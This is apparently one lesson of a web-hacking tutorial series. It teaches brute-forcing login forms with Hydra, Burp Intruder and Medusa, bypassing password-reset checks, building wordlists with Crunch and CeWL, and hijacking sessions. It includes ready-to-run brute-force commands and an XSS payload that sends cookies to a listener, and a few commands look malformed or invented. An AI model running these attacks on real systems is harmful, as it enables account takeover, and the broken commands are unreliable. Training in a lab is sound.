Day 6: Authentication & Bruteforce Attacks

Password Attacks & Auth Bypass: Hydra, Burp Intruder & Logic Testing

Authentication vulnerabilities are a common entry point for attackers to gain unauthorized access to web applications. Parrot OS, a Debian-based Linux distribution optimized for cybersecurity, provides robust tools for testing authentication mechanisms. On Day 6 of this 7-day web application hacking series, we focus on mastering authentication attacks and bypass techniques. This article covers brute-forcing login forms with Hydra and Burp Intruder, bypassing password reset logic, using and generating wordlists with rockyou.txt and Crunch, and the basics of session token prediction and hijacking. All commands use example.com as the illustrative target, but testing must be conducted on your local lab (e.g., DVWA or OWASP Juice Shop from Day 1) to ensure ethical practices. Both graphical user interface (GUI) and command-line interface (CLI) methods are included, with additional tools like Medusa and CeWL to provide comprehensive coverage. By mastering these techniques, you will be equipped to identify and exploit authentication vulnerabilities ethically and effectively.

Verifying the Test Lab

Ensure your test lab from Day 1 (DVWA and OWASP Juice Shop) is operational before proceeding with authentication testing.

Check LAMP Stack:
```
sudo systemctl status apache2
sudo systemctl status mysql
```
Verify that Apache and MySQL are running.
Access DVWA: Navigate to http://localhost/dvwa, log in with admin/password, and set the security level to “Low” for easier testing.
Access Juice Shop: Navigate to http://localhost:3000 to confirm OWASP Juice Shop is running.
Verify Proxy Setup: Ensure Burp Suite (from Day 3) is configured with Firefox for request interception.

Ethical Note: All commands use example.com for illustrative purposes. Only test on systems you own or have explicit permission to assess, such as your local lab. Unauthorized testing of live systems like example.com is illegal and unethical.

Task: Verify that DVWA is accessible and set to “Low” security level, confirm OWASP Juice Shop is operational, and ensure Burp Suite is configured.

Outcome: Your test lab is ready for authentication and brute-force testing.

Brute-Forcing Login Forms

Brute-force attacks attempt to guess credentials by systematically trying combinations from a wordlist. Hydra and Burp Intruder are powerful tools for this purpose.

Hydra

Hydra is a CLI-based password cracking tool that supports various protocols, including HTTP and HTTPS forms.

Basic HTTP POST Brute-Force:
```
hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login" -t 4
```
Attempts to brute-force the username admin with passwords from rockyou.txt against http://example.com/login.php. The Invalid login string indicates a failed attempt.

Multiple Users:

hydra -L /path/to/users.txt -P /usr/share/wordlists/rockyou.txt example.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login" -t 4

Uses a list of usernames.

HTTPS Form:

hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login" -t 4

Targets an HTTPS form.

Output to File:

hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login" -o hydra_results.txt -t 4

Saves results to a file.

DVWA Example:

hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect" -t 4

Brute-forces DVWA’s login form.

Burp Intruder

Burp Intruder (Day 3) is a GUI-based tool for brute-forcing forms within Burp Suite.

GUI Setup:
- Intercept a login POST request to http://example.com/login.php or http://localhost/dvwa/login.php in Burp’s Proxy.
- Send the request to Intruder (right-click > “Send to Intruder”).
- In the “Positions” tab, set the password parameter as the attack position (e.g., password=§pass§).
- In the “Payloads” tab, load /usr/share/wordlists/rockyou.txt.
- In the “Options” tab, set a grep match for “Invalid login” to identify failed attempts.
- Start the attack and review results for successful logins (e.g., different response lengths).

CLI (Professional Edition):

curl -X POST -d '{"url":"http://example.com/login.php","positions":"password","payloads":"file:///usr/share/wordlists/rockyou.txt"}' http://127.0.0.1:8080/api/intruder

Automates an Intruder attack via the Burp REST API (requires setup).

Task: Use Hydra to brute-force DVWA’s login form and Burp Intruder to test http://example.com/login.php (in your lab) with rockyou.txt.

Outcome: You can perform brute-force attacks on login forms using Hydra and Burp Intruder.

Password Reset Bypass Logic

Password reset mechanisms often contain logic flaws that allow attackers to bypass authentication.

Common Vulnerabilities

Weak Token Generation: Predictable or short reset tokens.
Insecure Reset Links: Links that expose user IDs or lack validation.
Logic Flaws: Allowing direct access to reset endpoints without authentication.

Manual Testing

Inspect Reset Flow:
- Request a password reset for admin@example.com on http://example.com/reset.php.
- Intercept the request in Burp Suite/ZAP to analyze parameters (e.g., user=admin).
- Modify the user parameter to another user (e.g., user=test) and forward.
Bypass Token Validation:
```
http://example.com/reset.php?token=12345&user=admin
```
Try predictable tokens (e.g., 12346, 00000) or remove the token parameter.
Direct Endpoint Access:
```
http://example.com/reset.php?user=admin&new_password=test123
```
Attempt to set a new password without a valid token.
DVWA Testing:
- Navigate to DVWA’s “Weak Session IDs” or a custom vulnerable reset page.
- Intercept the reset request and manipulate parameters (e.g., user_id).

Task: Test DVWA’s login form or a custom reset page for logic flaws by modifying parameters in Burp Suite/ZAP.

Outcome: You can identify and exploit password reset logic vulnerabilities.

Wordlists: rockyou.txt and Crunch

Effective brute-forcing relies on quality wordlists. Parrot OS includes rockyou.txt, and Crunch allows custom wordlist generation.

Using rockyou.txt

Location: /usr/share/wordlists/rockyou.txt (may need extraction if gzipped):
```
gunzip /usr/share/wordlists/rockyou.txt.gz
```

Filter Wordlist:

grep -E '^[a-zA-Z0-9]{6,12}$' /usr/share/wordlists/rockyou.txt > filtered_rockyou.txt

Creates a wordlist with passwords of 6–12 alphanumeric characters.

Hydra with rockyou.txt:

hydra -l admin -P /usr/share/wordlists/rockyou.txt http://example.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login" -t 4

Generating Wordlists with Crunch

Basic Wordlist:
```
crunch 6 8 -o passwords.txt
```
Generates 6–8 character passwords.
Custom Charset:
```
crunch 6 6 0123456789 -o numbers.txt
```
Generates 6-digit numeric passwords.
Pattern-Based:
```
crunch 8 8 -t admin%%% -o admin_passwords.txt
```
Generates passwords like admin123, admin456.

Hydra with Crunch:

crunch 6 6 0123456789 | hydra -l admin -P - http://example.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid login" -t 4

Pipes Crunch output directly to Hydra.

Task: Use rockyou.txt to brute-force DVWA’s login form with Hydra, and generate a custom wordlist with Crunch for testing http://example.com/login.php (in your lab).

Outcome: You can use and create effective wordlists for brute-force attacks.

Session Token Prediction and Hijacking Basics

Session tokens (e.g., cookies) authenticate users after login. Weaknesses in token generation or handling can lead to session hijacking.

Session Token Prediction

Inspect Tokens:
- Use Burp Suite/ZAP to capture cookies from http://example.com/login.php or http://localhost/dvwa.
- Look for predictable patterns (e.g., sequential IDs, timestamps).
Test Predictability:
```
curl -b "session=12345" http://example.com/profile.php
```
Try incrementing the session ID (e.g., 12346).
DVWA Testing:
- In DVWA’s “Weak Session IDs” module, generate multiple session IDs and check for patterns.

Session Hijacking

Capture Session Cookie:
- Use Burp Suite/ZAP to intercept a login request and copy the PHPSESSID or equivalent cookie.
Test Hijacking:
```
curl -b "PHPSESSID=your_session_id" http://localhost/dvwa/
```
Replace your_session_id with the captured cookie to access the session.
XSS Integration (from Day 5):
```
<script>document.location='http://localhost:8000?c='+document.cookie</script>
```
Steal cookies via XSS and use them in a curl request.

Task: Capture a session cookie from DVWA, test for predictability, and attempt session hijacking using curl or Burp Suite.

Outcome: You understand the basics of session token prediction and hijacking.

Additional Tools: Medusa and CeWL

Parrot OS includes additional tools to enhance authentication attacks.

Medusa

Medusa is a CLI-based brute-forcing tool similar to Hydra.

Basic Brute-Force:

medusa -u admin -P /usr/share/wordlists/rockyou.txt -h example.com -M http -m FORM-POST:/login.php -m FORM-DATA:POST:username=admin -m FORM-DATA:POST:password=^PASS^ -m DENY-SIGNAL:Invalid

Output to File:

medusa -u admin -P /usr/share/wordlists/rockyou.txt -h example.com -M http -m FORM-POST:/login.php -m FORM-DATA:POST:username=admin -m FORM-DATA:POST:password=^PASS^ -m DENY-SIGNAL:Invalid -o medusa_results.txt

CeWL

CeWL generates custom wordlists by crawling a website for words.

Basic Wordlist:
```
cewl http://example.com -w cewl_wordlist.txt
```
Creates a wordlist from example.com.

Custom Depth:

cewl http://example.com -d 2 -w cewl_wordlist.txt

Crawls to a depth of 2.

Use with Hydra:

hydra -l admin -P cewl_wordlist.txt localhost http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect" -t 4

Task: Use Medusa to brute-force DVWA’s login form and CeWL to generate a wordlist from http://localhost/dvwa for use with Hydra.

Outcome: You can enhance brute-forcing with additional tools and custom wordlists.

Practical Exercise

Verify your DVWA and OWASP Juice Shop lab setup.
Brute-force DVWA’s login form with Hydra and Burp Intruder using rockyou.txt.
Generate a custom wordlist with Crunch and test it on http://example.com/login.php (in your lab).
Test DVWA’s password reset or a custom reset page for logic flaws using Burp Suite/ZAP.
Capture and test session cookies for predictability and hijacking in DVWA.
Use Medusa and CeWL to perform additional brute-force attacks on DVWA.

Conclusion

Day 6 of this 7-day web application hacking series has equipped you with the skills to test authentication mechanisms using Parrot OS. By mastering brute-forcing with Hydra and Burp Intruder, bypassing password reset logic, generating wordlists with Crunch and CeWL, and understanding session token prediction and hijacking, you can identify and exploit authentication vulnerabilities in a controlled environment. These techniques are critical for ethical hacking and vulnerability assessment. Continue practicing in your lab, and prepare for Day 7, where you will explore advanced exploitation and reporting.

Next Steps:

Experiment with additional wordlists and tools like John the Ripper.
Test authentication challenges in OWASP Juice Shop.
Engage with cybersecurity communities on platforms like X to share insights and learn best practices.

Day 4: Web Vulnerability Scanning | Secure Your Website Now

E-Commerce Web Security Testing: Complete Guide 2025

Secure Your Website from Hackers in 2025: Full Guide

VPN for Beginners

Day 7: Logs, Reporting & Cybersecurity Career Guide

Exploitation & Injection Attacks Guide (Day 5 Hacking)

Leave a Reply Cancel reply